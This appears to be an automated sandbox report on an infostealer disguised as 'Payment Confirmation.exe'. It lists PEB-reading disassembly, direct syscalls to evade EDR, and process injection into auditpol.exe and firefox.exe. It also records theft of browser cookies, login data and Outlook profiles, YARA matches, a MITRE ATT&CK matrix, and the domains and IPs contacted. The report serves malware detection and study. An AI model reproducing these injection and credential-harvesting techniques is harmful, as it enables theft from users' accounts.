                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A0A830 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A7483A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019F2835 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019F2835 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A5C810 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019D4859 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A66870 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A5E872 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019E2840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A00854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A84BB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019E0BBE mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019D0BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019F0BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A5CBF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019FEBFC mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019D8BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A7EBD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A98B28 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01AA4B00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A4EB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019FEB20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019C8B50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019CCB7E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A84B4B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A78B42 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A66B40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A9AB40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A7EB50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01AA2B57 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A26AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_019DEA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01AA4A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exe Code function: 7_2_01A08A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D8AA0 mov eax, dword ptr fs:[00000030h]7_2_019D8AA0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D8AA0 mov eax, dword ptr fs:[00000030h]7_2_019D8AA0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D0AD0 mov eax, dword ptr fs:[00000030h]7_2_019D0AD0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0AAEE mov eax, dword ptr fs:[00000030h]7_2_01A0AAEE
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0AAEE mov eax, dword ptr fs:[00000030h]7_2_01A0AAEE
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A26ACC mov eax, dword ptr fs:[00000030h]7_2_01A26ACC
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A26ACC mov eax, dword ptr fs:[00000030h]7_2_01A26ACC
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A26ACC mov eax, dword ptr fs:[00000030h]7_2_01A26ACC
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A04AD0 mov eax, dword ptr fs:[00000030h]7_2_01A04AD0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A04AD0 mov eax, dword ptr fs:[00000030h]7_2_01A04AD0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0CA24 mov eax, dword ptr fs:[00000030h]7_2_01A0CA24
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A0CA38 mov eax, dword ptr fs:[00000030h]7_2_01A0CA38
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F4A35 mov eax, dword ptr fs:[00000030h]7_2_019F4A35
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019F4A35 mov eax, dword ptr fs:[00000030h]7_2_019F4A35
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019FEA2E mov eax, dword ptr fs:[00000030h]7_2_019FEA2E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A5CA11 mov eax, dword ptr fs:[00000030h]7_2_01A5CA11
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E0A5B mov eax, dword ptr fs:[00000030h]7_2_019E0A5B
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019E0A5B mov eax, dword ptr fs:[00000030h]7_2_019E0A5B
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_01A7EA60 mov eax, dword ptr fs:[00000030h]7_2_01A7EA60
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D6A50 mov eax, dword ptr fs:[00000030h]7_2_019D6A50
                Source: C:\Users\user\Desktop\Payment Confirmation.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtQuerySystemInformation: Direct from: 0x772748CC
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtQueryVolumeInformationFile: Direct from: 0x77272F2C
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtOpenSection: Direct from: 0x77272E0C
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtClose: Direct from: 0x77272B6C
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtReadVirtualMemory: Direct from: 0x77272E8C
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtCreateKey: Direct from: 0x77272C6C
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtSetInformationThread: Direct from: 0x77272B4C
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtQueryAttributesFile: Direct from: 0x77272E6C
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtAllocateVirtualMemory: Direct from: 0x772748EC
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtQueryInformationToken: Direct from: 0x77272CAC
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtTerminateThread: Direct from: 0x77272FCC
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtOpenKeyEx: Direct from: 0x77272B9C
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtDeviceIoControlFile: Direct from: 0x77272AEC
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtAllocateVirtualMemory: Direct from: 0x77272BEC
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtProtectVirtualMemory: Direct from: 0x77267B2E
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtCreateFile: Direct from: 0x77272FEC
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtOpenFile: Direct from: 0x77272DCC
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtWriteVirtualMemory: Direct from: 0x77272E3C
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtMapViewOfSection: Direct from: 0x77272D1C
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtResumeThread: Direct from: 0x772736AC
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtProtectVirtualMemory: Direct from: 0x77272F9C
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtSetInformationProcess: Direct from: 0x77272C5C
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtNotifyChangeKey: Direct from: 0x77273C2C
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtCreateMutant: Direct from: 0x772735CC
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtSetInformationThread: Direct from: 0x772663F9
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtQueryInformationProcess: Direct from: 0x77272C26
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtResumeThread: Direct from: 0x77272FBC
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtCreateUserProcess: Direct from: 0x7727371C
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtWriteVirtualMemory: Direct from: 0x7727490C
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtOpenKeyEx: Direct from: 0x77273C9C
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtAllocateVirtualMemory: Direct from: 0x77272BFC
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtReadFile: Direct from: 0x77272ADC
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtQuerySystemInformation: Direct from: 0x77272DFC
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | NtDelayExecution: Direct from: 0x77272DDC
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Memory written: C:\Users\user\Desktop\Payment Confirmation.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Section loaded: NULL target: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Section loaded: NULL target: C:\Windows\SysWOW64\auditpol.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: NULL target: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe protection: read write
                Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: NULL target: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\auditpol.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\auditpol.exe | Thread register set: target process: 5156
                Source: C:\Windows\SysWOW64\auditpol.exe | Thread APC queued: target process: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Process created: C:\Users\user\Desktop\Payment Confirmation.exe "C:\Users\user\Desktop\Payment Confirmation.exe"
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exe | Process created: C:\Windows\SysWOW64\auditpol.exe "C:\Windows\SysWOW64\auditpol.exe"
                Source: C:\Windows\SysWOW64\auditpol.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: yT3kwEipvxIo4KXERrb.exe, 00000009.00000000.1471293974.0000000001631000.00000002.00000001.00040000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 00000009.00000002.3731046495.0000000001631000.00000002.00000001.00040000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 0000000B.00000002.3731606388.0000000000E21000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
                Source: yT3kwEipvxIo4KXERrb.exe, 00000009.00000000.1471293974.0000000001631000.00000002.00000001.00040000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 00000009.00000002.3731046495.0000000001631000.00000002.00000001.00040000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 0000000B.00000002.3731606388.0000000000E21000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: yT3kwEipvxIo4KXERrb.exe, 00000009.00000000.1471293974.0000000001631000.00000002.00000001.00040000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 00000009.00000002.3731046495.0000000001631000.00000002.00000001.00040000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 0000000B.00000002.3731606388.0000000000E21000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: yT3kwEipvxIo4KXERrb.exe, 00000009.00000000.1471293974.0000000001631000.00000002.00000001.00040000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 00000009.00000002.3731046495.0000000001631000.00000002.00000001.00040000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 0000000B.00000002.3731606388.0000000000E21000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Queries volume information: C:\Users\user\Desktop\Payment Confirmation.exe VolumeInformation
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Queries volume information: C:\Windows\Fonts\GILSANUB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\Payment Confirmation.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match | File source: 7.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000A.00000002.3731694034.0000000003A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.3731637092.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.3733429458.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1549027122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.3729621746.0000000003300000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1551387798.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1551550451.0000000003B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.3731554872.0000000004B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\auditpol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\auditpol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\auditpol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\auditpol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\auditpol.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\auditpol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\auditpol.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\auditpol.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\auditpol.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match | File source: 7.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 7.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000A.00000002.3731694034.0000000003A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.3731637092.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.3733429458.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1549027122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.3729621746.0000000003300000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1551387798.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.1551550451.0000000003B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.3731554872.0000000004B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                MITRE ATT&CK Matrix (techniques listed per tactic; a number preceding a technique name is the count shown next to it in the report's matrix)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                Privilege Escalation: 412 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 412 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 4 Obfuscated Files or Information; 2 Software Packing; 1 Timestomp; 1 DLL Side-Loading
                Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                Discovery: 121 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 113 System Information Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing; Network Service Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                Collection: 1 Email Collection; 1 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
                Behavior Graph ID: 1665536 | Sample: Payment Confirmation.exe | Start date: 15/04/2025 | Architecture: WINDOWS | Score: 100

                Behavior graph (process chain with attached signatures and network nodes):

                • Start node: www.tieniu09.xyz; www.globedesign.xyz; 17 other IPs or domains. Signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 4 other signatures. www.globedesign.xyz: Performs DNS queries to domains with low reputation
                • Payment Confirmation.exe (started): dropped C:\Users\...\Payment Confirmation.exe.log, ASCII. Signature: Injects a PE file into a foreign processes
                • Payment Confirmation.exe (child, started): Signature: Maps a DLL or memory area into another process
                • yT3kwEipvxIo4KXERrb.exe (injected): Signature: Found direct / indirect Syscall (likely to bypass EDR)
                • auditpol.exe (started): Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                • yT3kwEipvxIo4KXERrb.exe (injected): amazonas.uol.com.br 200.147.100.53, 49694, 80 UniversoOnlineSABR Brazil; stuhlmann.cloud 81.169.145.84, 49740, 49741, 49742 STRATOSTRATOAGDE Germany; 7 other IPs or domains. Signature: Found direct / indirect Syscall (likely to bypass EDR)
                • firefox.exe (started)
